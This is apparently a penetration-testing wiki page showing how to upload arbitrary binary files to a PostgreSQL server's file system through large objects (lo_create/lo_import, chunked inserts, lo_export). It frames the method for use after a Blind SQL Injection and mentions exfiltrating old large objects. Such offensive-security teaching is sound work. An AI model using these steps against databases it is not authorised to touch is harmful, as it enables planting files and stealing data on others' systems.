# Big Binary Files Upload (PostgreSQL)


## PostgreSQL Large Objects

PostgreSQL offers a structure known as large objects, accessible via the `pg_largeobject` table, designed for storing large data types such as images or PDF documents. This approach is advantageous over the `COPY TO` function because the data can later be exported back to the file system as an exact, byte-for-byte replica of the original file.

To store a complete file in this table, an object must first be created in the pg_largeobject table (identified by a LOID), and the data then inserted into it in 2KB chunks. It is crucial that every chunk is exactly 2KB in size (with the possible exception of the last one) for the exporting function to work correctly.

To divide your binary data into 2KB chunks, the following command can be executed:

```bash
split -b 2048 your_file   # Creates 2KB sized files
```

For encoding each file into Base64 or Hex, the commands below can be used:

```bash
base64 -w 0 <Chunk_file>              # Encodes in Base64 in one line
xxd -ps -c 99999999999 <Chunk_file>   # Encodes in Hex in one line
```

Important: when automating this process, make sure each chunk corresponds to 2KB of raw (clear-text) bytes. Hex-encoded chunks therefore require 4KB of data each, since the encoding doubles the size, while Base64-encoded chunks take ceil(n / 3) * 4 characters (about 2,732 for a 2048-byte chunk).
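As a quick sanity check of these sizes, the sketch below generates a dummy 2048-byte chunk (the file name xaa is simply the default name split gives its first output file) and measures both encodings:

```bash
# Create a 2048-byte test chunk and count the characters of each encoding
head -c 2048 /dev/urandom > xaa
echo "hex:    $(xxd -ps -c 99999999999 xaa | tr -d '\n' | wc -c) characters"   # 4096
echo "base64: $(base64 -w 0 xaa | tr -d '\n' | wc -c) characters"              # ceil(2048/3)*4 = 2732
```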

The contents of the large objects can be viewed for debugging purposes using:

```sql
select loid, pageno, encode(data, 'escape') from pg_largeobject;
```

## Using lo_creat & Base64

To store binary data, a LOID is first created:

```sql
SELECT lo_creat(-1);       -- Creates a new, empty large object
SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID
```

In situations requiring precise control, such as exploiting a Blind SQL Injection, lo_create is preferred for specifying a fixed LOID.

Data chunks can then be inserted as follows:

```sql
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));
```
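To avoid building these statements by hand, a minimal sketch could look like the following (it assumes the chunk files keep the default names xaa, xab, ... produced by split; the LOID 173454 and the output file inserts.sql are just example names):

```bash
#!/bin/bash
# Generate one INSERT per 2KB chunk produced by `split -b 2048 your_file`
LOID=173454   # example LOID, must match the object created with lo_create
PAGENO=0
for chunk in x??; do
    B64=$(base64 -w 0 "$chunk")
    echo "INSERT INTO pg_largeobject (loid, pageno, data) VALUES ($LOID, $PAGENO, decode('$B64', 'base64'));"
    PAGENO=$((PAGENO + 1))
done > inserts.sql
```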

To export and potentially delete the large object after use:

```sql
SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454);  -- Deletes the specified large object
```

## Using lo_import & Hex

The lo_import function can be utilized to create a large object and, optionally, to specify its LOID:

```sql
select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);
```

Following object creation, each page is overwritten with your data, ensuring each chunk does not exceed 2KB:

```sql
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
```
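As with the Base64 variant, a minimal sketch for generating these statements from the split chunks (again, the LOID 173454 and the output file updates.sql are only example names):

```bash
#!/bin/bash
# Generate one UPDATE per 2KB chunk produced by `split -b 2048 your_file`
LOID=173454   # example LOID, must match the object created with lo_import
PAGENO=0
for chunk in x??; do
    HEX=$(xxd -ps -c 99999999999 "$chunk" | tr -d '\n')
    echo "update pg_largeobject set data=decode('$HEX', 'hex') where loid=$LOID and pageno=$PAGENO;"
    PAGENO=$((PAGENO + 1))
done > updates.sql
```

Keep in mind that an UPDATE only affects pages that already exist in the imported object; if your file has more pages than the one passed to lo_import, the extra pages have to be added with INSERT statements instead.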

To complete the process, the data is exported and the large object is deleted:

```sql
select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454);  -- Deletes the specified large object
```
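If you can read both files, a quick integrity check confirms that all of the 2KB pages were written correctly (the paths below are the example ones used above):

```bash
# The hashes should match if the upload succeeded
md5sum your_file /path/to/your_file
```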

## Limitations

Note that large objects may have ACLs (Access Control Lists), which can restrict access even to objects created by your own user. However, older objects with permissive ACLs may still be accessible for content exfiltration.
